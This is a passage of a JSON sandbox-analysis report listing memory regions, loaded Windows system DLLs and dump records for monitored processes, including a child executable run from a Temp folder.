"start_va": 1906049024, "type": "region", "version": 1 }, "end_va": 1906372607, "entry_point": 1906054226, "filename": "\\Windows\\System32\\webio.dll", "id": "region_735", "name": "webio.dll", "norm_filename": "c:\\windows\\system32\\webio.dll", "region_type": "memory_mapped_file", "start_va": 1906049024, "timestamp": "00:00:48.207", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1995440128, "type": "region", "version": 1 }, "end_va": 1996709887, "entry_point": 1995447093, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_736", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1995440128, "timestamp": "00:00:48.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1996750848, "type": "region", "version": 1 }, "end_va": 1997754367, "entry_point": 1996757093, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_737", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1996750848, "timestamp": "00:00:48.211", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1992687616, "type": "region", "version": 1 }, "end_va": 1994764287, "entry_point": 1992696537, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_738", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1992687616, "timestamp": "00:00:48.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991901184, "type": "region", "version": 1 }, "end_va": 1992486911, "entry_point": 1991917489, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_739", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991901184, "timestamp": "00:00:48.214", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1970065407, "entry_point": 1968903562, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_740", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:00:48.214", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967521792, "type": "region", "version": 1 }, "end_va": 1967570943, "entry_point": 1967530894, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_741", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1967521792, "timestamp": "00:00:48.215", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1966211072, "type": "region", "version": 1 }, "end_va": 1966321663, "entry_point": 1966248889, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_742", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1966211072, "timestamp": "00:00:48.372", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 20709376, "type": "region", "version": 1 }, "end_va": 23654399, "entry_point": 20709376, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_743", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 20709376, "timestamp": "00:00:48.375", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000744-addr_0x00000000001f0000-size_0x000000000000d000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_118", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2084863, "entry_point": 0, "filename": null, "id": "region_744", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:00:48.443", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe\"", "filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe", "id": "proc_4", "image_name": "42753.exe", "monitor_reason": "child_process", "monitored_id": 4, "origin_monitor_id": 3, "ref_parent_process": { "ref_id": "proc_3", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000004-region_00000745-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_119", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_745", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:50.205", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000746-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_120", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_746", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:50.205", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_747", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:00:50.205", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 106496, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4300799, "entry_point": 4200000, "filename": "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe", "id": "region_748", "name": "42753.exe", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:00:50.205", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_749", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:50.205", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_750", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:50.206", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_751", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:50.209", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000752-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_121", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_752", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:50.209", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000753-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_122", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_753", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:50.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_754", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:50.225", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1732607, "entry_point": 1310720, "filename": "\\Windows\\System32\\locale.nls", "id": "region_755", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:00:50.225", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000756-addr_0x00000000001c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_123", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_756", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:00:50.226", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000757-addr_0x0000000000610000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_124", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 6356992, "type": "region", "version": 1 }, "end_va": 6422527, "entry_point": 0, "filename": null, "id": "region_757", "name": "private_0x0000000000610000", "norm_filename": null, "region_type": "private_memory", "start_va": 6356992, "timestamp": "00:00:50.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1716224, "start_va": 1604255744, "type": "region", "version": 1 }, "end_va": 1605971967, "entry_point": 1604380693, "filename": "\\Windows\\System32\\esent.dll", "id": "region_758", "name": "esent.dll", "norm_filename": "c:\\windows\\system32\\esent.dll", "region_type": "memory_mapped_file", "start_va": 1604255744, "timestamp": "00:00:50.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 540672, "start_va": 1857355776, "type": "region", "version": 1 }, "end_va": 1857896447, "entry_point": 1857362345, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_759", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1857355776, "timestamp": "00:00:50.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2359296, "start_va": 1895563264, "type": "region", "version": 1 }, "end_va": 1897922559, "entry_point": 1895589565, "filename": "\\Windows\\System32\\msi.dll", "id": "region_760", "name": "msi.dll", "norm_filename": "c:\\windows\\system32\\msi.dll", "region_type": "memory_mapped_file", "start_va": 1895563264, "timestamp": "00:00:50.228", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_761", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:50.228", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_762", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:00:50.228", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_763", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:50.229", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971978240, "type": "region", "version": 1 }, "end_va": 1984864255, "entry_point": 1972508161, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_764", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971978240, "timestamp": "00:00:50.229", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_765", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:50.230", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_766", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:50.230", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 503808, "start_va": 1986461696, "type": "region", "version": 1 }, "end_va": 1986965503, "entry_point": 1986468590, "filename": "\\Windows\\System32\\comdlg32.dll", "id": "region_767", "name": "comdlg32.dll", "norm_filename": "c:\\windows\\system32\\comdlg32.dll", "region_type": "memory_mapped_file", "start_va": 1986461696, "timestamp": "00:00:50.231", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_768", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:50.231", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_769", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:50.232", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_770", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:50.232", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_771", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:50.232", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1991864319, "entry_point": 1991613350, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_772", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:00:50.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_773", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:50.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1999224831, "entry_point": 1998109245, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_774", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:00:50.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_775", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:50.235", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000776-addr_0x00000000002c0000-size_0x00000000000c0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_125", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 786432, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3670015, "entry_point": 0, "filename": null, "id": "region_776", "name": "private_0x00000000002c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2883584, "timestamp": "00:00:50.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 2000617472, "type": "region", "version": 1 }, "end_va": 2000637951, "entry_point": 2000622648, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_777", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2000617472, "timestamp": "00:00:50.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5144575, "entry_point": 0, "filename": null, "id": "region_778", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:00:50.241", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_779", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:50.241", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_780", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:50.242", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000781-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_126", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_781", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:50.254", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000782-addr_0x00000000001b0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_127", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1773567, "entry_point": 0, "filename": null, "id": "region_782", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:00:50.255", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 6230015, "entry_point": 0, "filename": null, "id": "region_783", "name": "pagefile_0x00000000004f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5177344, "timestamp": "00:00:50.255", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 6422528, "type": "region", "version": 1 }, "end_va": 19005439, "entry_point": 0, "filename": null, "id": "region_784", "name": "pagefile_0x0000000000620000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6422528, "timestamp": "00:00:50.255", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000785-addr_0x00000000013c0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_128", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 20709376, "type": "region", "version": 1 }, "end_va": 20774911, "entry_point": 0, "filename": null, "id": "region_785", "name": "private_0x00000000013c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 20709376, "timestamp": "00:00:50.255", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000786-addr_0x0000000000380000-size_0x0000000000012000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_129", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 73728, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3743743, "entry_point": 0, "filename": null, "id": "region_786", "name": "private_0x0000000000380000", "norm_filename": null, "region_type": "private_memory", "start_va": 3670016, "timestamp": "00:00:50.257", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000787-addr_0x00000000003a0000-size_0x000000000000d000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_130", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 3854335, "entry_point": 0, "filename": null, "id": "region_787", "name": "private_0x00000000003a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3801088, "timestamp": "00:00:50.260", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 360448, "start_va": 1906376704, "type": "region", "version": 1 }, "end_va": 1906737151, "entry_point": 1906381748, "filename": "\\Windows\\System32\\winhttp.dll", "id": "region_788", "name": "winhttp.dll", "norm_filename": "c:\\windows\\system32\\winhttp.dll", "region_type": "memory_mapped_file", "start_va": 1906376704, "timestamp": "00:00:50.430", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, "start_va": 1906049024, "type": "region", "version": 1 }, "end_va": 1906372607, "entry_point": 1906054226, "filename": "\\Windows\\System32\\webio.dll", "id": "region_789", "name": "webio.dll", "norm_filename": "c:\\windows\\system32\\webio.dll", "region_type": "memory_mapped_file", "start_va": 1906049024, "timestamp": "00:00:50.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1995440128, "type": "region", "version": 1 }, "end_va": 1996709887, "entry_point": 1995447093, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_790", "name": "urlmon.dll", 